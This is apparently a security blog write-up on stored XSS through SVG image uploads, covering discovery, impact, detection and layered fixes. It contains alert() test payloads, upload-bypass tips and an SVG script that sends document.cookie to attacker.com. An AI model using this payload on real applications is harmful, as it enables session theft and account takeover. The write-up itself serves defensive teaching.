Introduction

It started as a routine security assessment.

The application looked clean — standard authentication, a dashboard, and a profile section with an image upload feature. Nothing stood out. No obvious misconfigurations. No immediate red flags.

Until an uploaded "image" executed JavaScript.

At that moment, the perspective shifted. The feature was no longer just a file upload — it was an entry point for code execution.

The Overlooked Risk in File Uploads

File upload functionality is deeply embedded in modern applications:

  1. Profile pictures
  2. Document sharing
  3. Assignment submissions
  4. Media management

Because of their ubiquity, they are often treated as low-risk components. This assumption becomes dangerous when developers generalize all image formats as passive content.

SVG (Scalable Vector Graphics) breaks that assumption.

Unlike traditional formats such as JPEG or PNG, SVG files are:

  1. XML-based
  2. Script-capable
  3. Parsed and executed by browsers

This means an SVG is not just a visual asset — it is an executable document.

The Discovery

During testing, the application enforced what appeared to be reasonable controls:

  1. Only image file types were allowed
  2. File extension validation was implemented

From a surface-level perspective, the control logic appeared sound.

However, when an SVG file was uploaded, it was accepted without resistance. No validation errors. No filtering.

This indicated a gap — not in the presence of controls, but in their depth.

Turning an Image into an Attack

To validate behavior, a minimal payload was embedded into an SVG:

```xml <svg xmlns="http://www.w3.org/2000/svg" onload="alert('XSS')"></svg> ```

The file was uploaded as a profile image. When the profile page rendered:

  1. The SVG was loaded
  2. The browser parsed the XML
  3. The `onload` event executed

The alert triggered successfully.

This confirmed a **Stored Cross-Site Scripting (XSS)** vulnerability.

The key issue was not just acceptance of the file — but how it was rendered.

Escalating the Attack

A proof-of-concept alert demonstrates execution. Real-world exploitation goes further.

Consider an expanded payload:

```xml <svg xmlns="http://www.w3.org/2000/svg"> <script> fetch('https://attacker.com/steal?cookie=' + document.cookie); </script> </svg> ```

With this:

* Session cookies can be exfiltrated * User sessions can be hijacked * Privileged accounts can be targeted

Because the file is stored persistently, every user who views the image becomes a potential victim. This transforms a single upload into a multi-user attack vector.

Why This Happens

This vulnerability is rooted in misplaced trust and incomplete validation.

The application:

* Trusted the file extension (`.svg`) * Did not validate or sanitize file content * Rendered user-controlled input directly in the browser

This combination creates a direct path to client-side code execution.

From a security perspective, this is a failure in "input validation, output handling, and trust boundaries".

The Real Impact

SVG-based XSS is not theoretical. Its impact can be severe:

* Persistent XSS affecting multiple users * Account takeover via session theft * Data exfiltration * Privilege escalation targeting administrators

In high-privilege contexts, this can escalate quickly to critical severity.

How to Identify This Vulnerability

A structured approach helps reliably detect this issue:

1. Locate Upload Features

Focus on any functionality that accepts user files:

* Profile images * Attachments * Media uploads

2. Attempt SVG Upload

Even if restricted:

* Rename extensions * Modify MIME types * Intercept and alter requests using tools like Burp Suite

3. Inject a Test Payload

Start with a minimal execution check:

```xml <svg onload="alert(1)"></svg> ```

4. Access the Uploaded File

* View it directly * Load it within the application

If JavaScript executes, the vulnerability is confirmed.

How to Fix It Properly

Mitigation requires layered controls. Single-point fixes are insufficient.

1. Restrict File Types

If SVG is not required, block it entirely.

2. Sanitize SVG Content

If SVG support is necessary:

* Remove `<script>` elements * Strip event handlers (`onload`, `onclick`, etc.)

3. Avoid Inline Rendering

Serve files as downloads:

``` Content-Disposition: attachment ```

This prevents browser execution.

4. Implement Content Security Policy (CSP)

Restrict script execution and external requests within rendered content.

5. Validate File Content

Do not rely on extensions. Inspect the actual file structure and content.

6. Isolate File Storage

Serve uploaded files from a separate domain to prevent session access.

A Critical Mindset Shift

Developers often approach uploads with this assumption:

> "It's just an image."

Attackers approach it differently:

> "Can this execute code?"

That difference defines whether a feature is safe or exploitable.

Conclusion

SVG file upload vulnerabilities demonstrate how modern web features can introduce risk when misunderstood.

They are:

* Easy to overlook * Simple to exploit * High in impact

Any application that accepts and renders SVG files without strict controls is exposed to client-side attacks.

Because in the browser, an image is not always just an image — it can be executable code.